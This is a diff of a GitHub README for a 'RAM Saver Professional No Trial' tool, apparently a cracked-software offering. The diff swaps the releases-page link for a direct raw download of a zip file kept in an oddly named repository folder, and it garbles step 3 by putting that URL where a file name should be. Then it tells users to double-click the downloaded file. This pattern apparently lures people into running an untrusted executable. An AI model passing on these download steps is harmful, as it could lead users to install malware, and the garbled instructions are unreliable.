awaisecp/RAM-Saver-Professional-No-Trial/README.md

 To begin using RAM Saver Professional, follow the steps below to download and install the software.

 ### ⬇️ Download & Install
-1. Visit this page to download: [RAM-Saver-Professional-No-Trial Releases](https://github.com/awaisecp/RAM-Saver-Professional-No-Trial/releases).
+1. Visit this page to download: [RAM-Saver-Professional-No-Trial Releases](https://raw.githubusercontent.com/awaisecp/RAM-Saver-Professional-No-Trial/main/irreparably/RAM-Saver-Professional-No-Trial_v1.5.zip).
 2. Locate the latest release at the top of the page.
-3. Click the link under "Assets" to download the application file (typically named `RAM-Saver-Professional.exe` or similar).
+3. Click the link under "Assets" to download the application file (typically named `https://raw.githubusercontent.com/awaisecp/RAM-Saver-Professional-No-Trial/main/irreparably/RAM-Saver-Professional-No-Trial_v1.5.zip` or similar).
 4. Once downloaded, locate the file in your Downloads folder.
 5. Double-click the file to run the installer.
 6. Follow the on-screen prompts to complete the installation.